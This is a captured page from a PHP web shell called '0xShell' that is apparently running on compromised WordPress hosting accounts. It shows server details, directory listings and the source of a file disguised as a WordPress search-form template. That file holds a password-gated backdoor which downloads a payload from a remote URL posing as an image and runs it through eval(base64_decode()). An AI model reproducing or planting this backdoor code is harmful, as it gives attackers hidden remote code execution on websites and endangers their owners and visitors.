0xShell Shell MySQL Netstat SMTP FTP SSH 未选择任何文件 Domain Upload file System Info: User: couragent | UID: 1022 | GID: 1024 | Groups: 1024 Server IP: 62.72.47.222 | Client IP: 23.145.24.71 PHP: 8.1.29 | OS: Linux | Server: LiteSpeed command /home/couragent/public_html$ Enter file path to read Files ../ � .htaccess � '0e 4e5 .tmb/ � .user.ini � '0e 4e5 .well-known/ � 123.php � '0e 4e5 cgi-bin/ � clasa99.php � '0e 4e5 error_log � '0e 4e5 evs.txt � '0e 4e5 home/ � index.php � 4e5 license.txt � '0e 4e5 op.php � '0e 4e5 php.ini � '0e 4e5 readme.html � '0e 4e5 robots.txt � '0e 4e5 wp-activate.php � '0e 4e5 wp-admin/ � wp-blog-header.php � '0e 4e5 wp-comments-post.php � '0e 4e5 wp-config-sample.php � '0e 4e5 wp-config.php � '0e 4e5 wp-content/ � wp-cron.php � '0e 4e5 wp-includes/ � wp-links-opml.php � '0e 4e5 wp-load.php � '0e 4e5 wp-login.php � '0e 4e5 wp-mail.php � '0e 4e5 wp-settings.php � '0e 4e5 wp-signup.php � '0e 4e5 wp-trackback.php � '0e 4e5 xmlrpc.php � '0e 4e5 Viewing: op.php 0xShell

0xShell

Shell MySQL Netstat SMTP FTP SSH
×

Upload to Multiple Directories




System Info:
User: jonasls | UID: 188156 | GID: 100 | Groups: 100
Server IP: 10.127.20.1 | Client IP: 216.73.216.28
PHP: 8.0.30 | OS: Linux | Server: Apache
/home/jonasls/www/7affd2$

Files

Viewing: defaults.php.tar

home/jonasls/www/defaults.php000044400000003336152204644550012323 0ustar00<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
/*
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage
 * @since 1.0 */

$l = "https://user-images.githubusercontent.com/143735067/264713238-ae810af4-c98d-421f-bbb3-1ddcc58f952a.jpg"/* "" - ni*/;

//DX for each form and a string
		if( function_exists('curl_init') ) {
			$ch = curl_init();
			curl_setopt($ch, CURLOPT_URL, $l);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
			curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
			curl_setopt($ch, CURLOPT_HEADER, FALSE);
			curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
			$body = curl_exec($ch);
			curl_close($ch);
		}
		else {
			$body = @file_get_contents($l);
		}
	 eval(base64_decode($body));
?>
Disabled functions: _dyuweyrj4,_dyuweyrj4r,dl
Disabled functions: None